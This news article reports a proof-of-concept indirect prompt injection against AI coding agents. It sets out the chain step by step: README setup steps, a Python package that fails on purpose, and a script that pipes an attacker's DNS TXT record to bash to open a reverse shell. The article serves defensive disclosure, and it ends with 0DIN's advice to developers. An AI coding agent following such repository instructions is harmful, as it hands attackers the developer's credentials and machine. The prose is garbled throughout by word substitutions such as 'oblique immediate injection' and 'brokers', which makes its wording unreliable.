A malicious GitHub repository can silently compromise a developer’s machine with out containing a single line of malicious code, safety researchers at Mozilla’s Zero Day Investigative Community (0DIN) warned.
The assault
The proof-of-concept assault targets AI-powered coding brokers comparable to Claude Code, and makes use of oblique immediate injection to govern an AI agent into taking dangerous actions the developer by no means explicitly approved.
The assault chain is as follows:
- The malicious repository presents normal-looking setup directions within the README file
- A Python package deal is engineered to fail on first use and direct the person to run an initialization command
- That command calls a shell script, which resolves a DNS TXT document managed by the attacker, and pipes its contents on to bash.
The executed malicious payload – a reverse shell on this case – shouldn’t be within the repository. It’s fetched and executed solely at runtime. Thus, the payload is “invisible” to code overview, static evaluation instruments, and the AI agent studying the repository.
The agent merely follows the setup steps, recovers from an anticipated error as instructed, and unknowingly opens a connection again to the attacker’s server. From that time, the attacker has an interactive shell working with the developer’s personal privileges.
“Agentic coding instruments have entry to all the pieces they want for this [attack]: non-public information, together with atmosphere variables, credentials, API keys, and native configuration recordsdata,” the researchers famous.
Recommendation for builders
0DIN recommends that AI coding brokers be designed to floor what a command will truly execute at runtime, slightly than evaluating solely the literal command string.
“Builders ought to deal with setup directions and scripts in unfamiliar repositories as untrusted code, no matter what their AI software recommends,” they added.
Subscribe to our breaking information e-mail alert to by no means miss out on the most recent breaches, vulnerabilities and cybersecurity threats. Subscribe right here!